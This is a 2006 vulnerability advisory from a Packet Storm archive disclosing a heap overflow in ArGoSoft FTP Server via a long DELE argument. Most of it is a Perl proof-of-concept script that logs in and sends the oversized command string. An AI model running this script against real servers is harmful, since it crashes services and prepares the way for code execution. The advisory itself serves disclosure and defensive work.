argoOverflow.txt

2006-02-26T00:00:00
ID PACKETSTORM:44198
Type packetstorm
Reporter Jerome Athias
Modified 2006-02-26T00:00:00

Description

                                        
                                            `-- Title:  
ArGoSoft FTP server remote heap overflow  
  
-- Affected Products:  
ArGoSoft FTP server 1.4.3.5 (current) and prior  
  
-- Affected Vendor:  
ArGoSoft - http://www.argosoft.com  
  
-- Impact:  
DoS, Arbitrary Code Execution  
  
-- Where:  
>>From remote  
  
-- Type:  
Heap Overflow  
  
-- Vulnerability Details:  
A remote attacker with valid credentials is able to trigger a heap  
overwrite in ArgoSoft FTP server.  
The bug occurs by providing a long argument to the DELE command. This  
vulnerability can allow remote attackers to execute arbitrary code or  
launch a denial of service attack.  
  
-- Credit:  
This vulnerability was discovered by Jerome Athias.  
https://www.securinfos.info/english/  
  
  
  
  
#!/usr/bin/perl  
  
# ---------------------------------------------------- #  
# ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server #  
# Jerome Athias #  
# ---------------------------------------------------- #  
  
use Net::FTP;  
  
# geting data  
$host = @ARGV[0];  
$port = @ARGV[1];  
$debug = @ARGV[2];  
$user = @ARGV[3];  
$pass = @ARGV[4];  
  
# ===========  
  
if (($host) && ($port)) {  
  
# make exploit string  
$exploit_string = "DELE ";  
$exploit_string .= "A" x 2041;  
$exploit_string .= "B" x 4;  
$exploit_string .= "C" x 1026;  
  
# On Win2K SP4 FR:  
# EAX 42424241  
# ECX 43434343  
# EDX 43434342  
# EBX 43434B73  
  
# ===================  
  
print "Trying to connect to $host:$port\n";  
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30,  
Debug=> $debug) or die "[-] Connection failed\n";  
print "[+] Connect OK!\n";  
print "Logging...\n";  
if (!$user) {  
$user = "test";  
$pass = "test";  
}  
$sock->login($user, $pass);  
$answer = $sock->message;  
print "Sending string...\n";  
$sock->quot($exploit_string);  
} else {  
print "ArgoSoft FTP Server - PoC  
Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username  
password [debug: 1 or 0]\n\n";  
}  
`